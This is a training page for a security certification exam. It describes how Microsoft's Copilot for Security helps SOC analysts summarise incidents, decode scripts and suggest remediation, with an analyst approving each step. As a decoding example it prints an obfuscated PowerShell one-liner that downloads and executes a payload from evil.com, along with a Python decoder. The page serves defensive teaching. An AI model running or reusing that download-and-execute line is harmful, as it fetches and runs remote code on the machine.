Copilot for Security: Your AI Analyst
AI is joining the SOC. Learn how Copilot for Security, embedded in Defender XDR and Sentinel, accelerates incident investigation with natural language queries, automatic summaries, and guided response.
AI in the SOC
Imagine having a brilliant analyst sitting next to you who has read every Microsoft security doc, every MITRE technique, and every incident report — and can summarise any incident in seconds.
That is Copilot for Security. It is embedded directly in Defender XDR and Sentinel, so you can ask it questions in plain English: “Summarise this incident,” “What is this script doing?”, “What should I do next?”
Copilot does not replace analysts — it accelerates them. It handles the repetitive analysis (reading logs, correlating events, explaining scripts) so the human analyst can focus on decisions and judgment.
Where Copilot appears
Copilot for Security is embedded in multiple places:
| Location | What Copilot Does |
|---|---|
| Incident summary | Auto-generates a plain-English summary of the incident — what happened, what entities are involved, what the impact is |
| Alert investigation | Explains what triggered the alert and provides context from Microsoft’s threat intelligence |
| Script analysis | Decodes and explains PowerShell, command-line, and script content found in alerts |
| Guided response | Suggests next steps based on the incident type and current investigation state |
| KQL assistant | Helps write or explain KQL queries in Advanced Hunting |
| Sentinel notebooks | Assists with Python code and investigation logic in Jupyter notebooks |
Key Copilot capabilities
Incident summarisation
When you open an incident, Copilot auto-generates a summary: “This incident involves a phishing email sent to 12 users, 3 of whom clicked the link. One user submitted credentials on the phishing site. Attack disruption disabled the compromised account.”
This can save a Tier 1 analyst 5-10 minutes of manual alert review per incident.
Script analysis
Attackers use obfuscated scripts to evade detection. Copilot decodes and explains them:
Obfuscated PowerShell:
```powershell
$a=[System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aHR0cDovL2V2aWwuY29tL3BheWxvYWQ='));IEX(New-Object Net.WebClient).DownloadString($a)
```
Copilot explanation: “This script decodes a Base64 string to reveal the URL http://evil.com/payload, then downloads and executes the content from that URL. This is a classic download-and-execute pattern commonly used for malware delivery.”
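You can reproduce the decoding step yourself. The sketch below is a minimal Python illustration (the helper name and the regex heuristic are assumptions, not a Copilot feature); it pulls Base64-looking tokens out of a command line and decodes the ones that yield printable text, using the sample string from the script above:

```python
import base64
import re

def decode_b64_strings(command_line: str) -> list[str]:
    """Find Base64-looking tokens in a command line and decode them.

    A token qualifies if it decodes cleanly to printable UTF-8 --
    the same sanity check an analyst would apply by hand.
    """
    decoded = []
    for token in re.findall(r"[A-Za-z0-9+/]{16,}={0,2}", command_line):
        try:
            text = base64.b64decode(token, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue  # not valid Base64, or not text -- skip
        if text.isprintable():
            decoded.append(text)
    return decoded

# The encoded URL from the PowerShell sample above:
cmd = "FromBase64String('aHR0cDovL2V2aWwuY29tL3BheWxvYWQ=')"
print(decode_b64_strings(cmd))  # ['http://evil.com/payload']
```

This is exactly what Copilot does at a larger scale, with the added step of explaining what the decoded content means in context.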
Guided response
Copilot suggests investigation and remediation steps based on the incident context:
- “Check if other users received the same phishing email”
- “Review the compromised user’s recent sign-in activity”
- “Reset the user’s password and revoke active sessions”
- “Block the phishing URL as an indicator”
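One of those remediation steps — revoking active sessions — maps to a single Microsoft Graph call, `POST /users/{id}/revokeSignInSessions`. A minimal sketch of building that request (the user principal name is a placeholder, and token acquisition and the actual HTTP send are out of scope here):

```python
# Sketch: construct the Microsoft Graph request that invalidates a
# user's refresh tokens and session cookies after a compromise.
GRAPH_BASE = "https://graph.microsoft.com/v1.0"

def build_revoke_request(user_id: str) -> tuple[str, str]:
    """Return (method, url) for the revokeSignInSessions call."""
    return ("POST", f"{GRAPH_BASE}/users/{user_id}/revokeSignInSessions")

method, url = build_revoke_request("compromised.user@contoso.com")
print(method, url)
```

In practice you would send this with an authenticated client (e.g. the Microsoft Graph SDK) and follow it with a password reset, since revocation alone does not stop re-authentication with stolen credentials.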
Promptbooks
Promptbooks are pre-built investigation workflows — a sequence of prompts that Copilot executes in order:
| Promptbook | What It Does |
|---|---|
| Incident investigation | Summarise → list entities → check TI → suggest response |
| Vulnerability impact | Identify affected assets → assess exposure → recommend patching |
| Suspicious script analysis | Decode → explain behaviour → identify IOCs → suggest containment |
| User compromise investigation | Check sign-ins → check audit logs → check MFA changes → suggest remediation |
You can also create custom promptbooks for your organisation’s specific investigation workflows.
Agentic AI in Copilot for Security
The term agentic AI in the exam context refers to Copilot’s ability to:
- Chain investigation steps — follow leads from one finding to the next with guided prompts
- Proactively suggest actions — within defined guardrails, Copilot proposes next steps unprompted (e.g., “query this table next”, “check this entity”)
- Reason about context — understand the incident holistically, not just individual alerts
Critical distinction: Copilot suggests and assists — the analyst reviews and approves. Agentic does not mean fully autonomous.
Exam tip: Copilot assists but does not replace
The exam expects you to know that Copilot:
- Can: Summarise incidents, explain scripts, suggest next steps, write KQL, enrich entities
- Cannot: Independently make remediation decisions (it suggests, the analyst approves), access data it does not have permissions for, or guarantee 100% accuracy
If a question asks “what should the analyst do after Copilot suggests remediation steps?” — the answer is review and approve the suggestions, not blindly follow them.
Scenario: James uses Copilot during a complex investigation
James at Pacific Meridian opens a complex incident with 23 alerts across 8 entities. Manually correlating these would take an hour.
Copilot interaction:
- James clicks “Summarise incident” → Copilot produces: “Multi-stage attack beginning with a phishing email to 3 HR staff. One compromised account was used to access SharePoint HR files. The attacker then moved laterally to a file server using stolen NTLM credentials.”
- James asks: “What is the obfuscated PowerShell in alert #7 doing?” → Copilot decodes and explains the Base64-encoded downloader
- James asks: “Which devices should I prioritise for investigation?” → Copilot ranks devices by number of related alerts and severity
- James uses the “User compromise” promptbook → Copilot checks sign-ins, audit logs, MFA changes, and reports findings
Result: Investigation that would have taken 90 minutes completed in 25 minutes. James still makes all remediation decisions.
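The device-prioritisation step in that interaction can be expressed as a simple sort. A sketch with made-up alert data — the weighting scheme is an assumption for illustration, not Copilot's actual ranking model:

```python
SEVERITY_WEIGHT = {"low": 1, "medium": 2, "high": 3}  # assumed weights

def prioritise(devices: dict[str, list[str]]) -> list[str]:
    """Rank devices by (related alert count, worst severity), highest first."""
    def score(item):
        name, severities = item
        return (len(severities), max(SEVERITY_WEIGHT[s] for s in severities))
    return [name for name, _ in sorted(devices.items(), key=score, reverse=True)]

alerts = {  # device -> severities of its related alerts (illustrative)
    "HR-LAPTOP-07": ["high", "high", "medium"],
    "FILESRV-01": ["high", "medium", "medium", "low"],
    "HR-LAPTOP-02": ["low"],
}
print(prioritise(alerts))  # FILESRV-01 first: most related alerts
```

The value of Copilot here is not the sort itself but that it gathers the alert counts and severities across all 8 entities for you before ranking them.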
James encounters an obfuscated PowerShell script in a Defender XDR alert. He cannot understand what the script does. What is the fastest way to analyse it?
Copilot for Security suggests resetting a user's password and revoking all sessions after detecting an account compromise. What should the analyst do?
🎬 Video coming soon
Next up: AI has accelerated our investigation. Now let’s tackle the hardest incidents — complex, multi-stage attacks with lateral movement across domains.